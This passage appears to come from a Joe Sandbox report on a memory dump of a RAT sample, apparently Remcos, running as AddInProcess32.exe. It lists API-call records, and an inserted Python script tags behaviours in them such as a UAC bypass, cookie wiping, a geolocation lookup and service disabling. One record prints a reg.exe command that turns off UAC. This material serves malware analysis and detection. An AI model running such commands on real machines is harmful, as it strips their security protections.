                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 3950776272-0
                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                        • Opcode Fuzzy Hash: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
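The function records in this dump can be triaged mechanically rather than read one by one. The script below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses the "APIs" and "String ID" lines of these records and tags the behaviours the AddInProcess32 dump shows, the CMSTPLUA elevation (CoGetObject reached from 004075D0 next to the "[+] ucmCMLuaUtilShellExecMethod" string), the Chrome cookie deletion at 0040BADD, the geoplugin.net lookup at 0041B3BD, the service disable through ChangeServiceConfigW at 0041ACDE and the ControlService stop in the record that follows. The rule names are the script's own; reading 00000004 in the third ChangeServiceConfigW argument as SERVICE_DISABLED and 00000001 in the second ControlService argument as SERVICE_CONTROL_STOP is an assumption taken from the Win32 prototypes, not from the report. The embedded sample is copied from the records in this report and trimmed to the lines the rules need.

```python
import re

# One "APIs" line of a Joe Sandbox IDA Plugin function record, e.g.
#   • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
#   • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,...), ref: 00407582
#   • _free.LIBCMT ref: 00450F48
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Assumed from the Win32 prototypes, not stated in the report: dwStartType is
# the 3rd ChangeServiceConfigW argument, dwControl the 2nd ControlService argument.
SERVICE_DISABLED = "00000004"
SERVICE_CONTROL_STOP = "00000001"

def parse_records(text):
    """Split report text into function records (API calls, strings, fuzzy hash)."""
    records, cur = [], {"apis": [], "strings": []}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] is not None else []
            cur["apis"].append(call)
            continue
        s = line.strip()
        if s.startswith("• String ID:"):
            # Joe joins a function's literals with '$'; a literal '$' (CONOUT$)
            # is indistinguishable from the separator, so string rules are hints only.
            cur["strings"] += [x.strip() for x in s.split(":", 1)[1].split("$") if x.strip()]
        elif s.startswith("• Instruction Fuzzy Hash:"):
            cur["fuzzy"] = s.split(":", 1)[1].strip()
            records.append(cur)
            cur = {"apis": [], "strings": []}
    if cur["apis"]:  # record truncated at the end of the excerpt
        records.append(cur)
    return records

def tag_record(rec):
    """Map one record's API calls and strings to behaviour tags (rule names are ours)."""
    names = {a["name"] for a in rec["apis"]}
    blob = " ".join(rec["strings"] + [",".join(a["args"]) for a in rec["apis"]]).lower()
    tags = set()
    if "CoGetObject" in names and "ucmcmluautilshellexecmethod" in blob:
        tags.add("uac_bypass_cmstplua")
    if "cookies" in blob and ("DeleteFileA" in names or "cleared" in blob):
        tags.add("browser_cookie_wipe")
    if "InternetOpenUrlW" in names and "geoplugin.net" in blob:
        tags.add("geolocation_lookup")
    for a in rec["apis"]:
        if a["name"] == "ChangeServiceConfigW" and a["args"][2:3] == [SERVICE_DISABLED]:
            tags.add("service_disable")
        if a["name"] == "ControlService" and a["args"][1:2] == [SERVICE_CONTROL_STOP]:
            tags.add("service_stop")
    return tags

def scan(text):
    """Return {ref of the record's first call: sorted tags} for records that fire."""
    hits = {}
    for rec in parse_records(text):
        tags = tag_record(rec)
        if tags and rec["apis"]:
            hits[rec["apis"][0]["ref"]] = sorted(tags)
    return hits

# Constructed test input: lines copied from this report's function records.
SAMPLE = """\
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
• String ID: http://geoplugin.net/json.gp
• Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe), ref: 004075D0
  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
• CoUninitialize.OLE32 ref: 00407629
• String ID: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
APIs
• DeleteFileA.KERNEL32(00000000,\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies), ref: 0040BADD
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies
• Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
• Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
"""

if __name__ == "__main__":
    for ref, tags in scan(SAMPLE).items():
        print(ref, ", ".join(tags))
```

Paste the full "Function" section of a report into SAMPLE (or read it from a file) and the script lists, per function, the first call's address and the rules it triggered; argument-position rules such as service_disable are more reliable than the string rules, because the "String ID" field has no escaping for a literal "$".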
                                        APIs
                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                        • _free.LIBCMT ref: 0044824C
                                        • _free.LIBCMT ref: 00448274
                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                        • _abort.LIBCMT ref: 00448293
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                        • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                        • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                        • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                        • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                        • GetLastError.KERNEL32 ref: 0041D580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                        Strings
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076C4
                                        • SG, xrefs: 004076DA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        • API String ID: 0-1732489412
                                        • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                        • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: KeepAlive | Disabled
                                        • API String ID: 2993684571-305739064
                                        • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                        • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                        Strings
                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                        • API String ID: 3024135584-2418719853
                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll$`#v
                                        • API String ID: 1646373207-1032071883
                                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                        APIs
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • _free.LIBCMT ref: 00444E06
                                        • _free.LIBCMT ref: 00444E1D
                                        • _free.LIBCMT ref: 00444E3C
                                        • _free.LIBCMT ref: 00444E57
                                        • _free.LIBCMT ref: 00444E6E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$AllocateHeap
                                        • String ID:
                                        • API String ID: 3033488037-0
                                        • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                        • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                        • _free.LIBCMT ref: 004493BD
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00449589
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
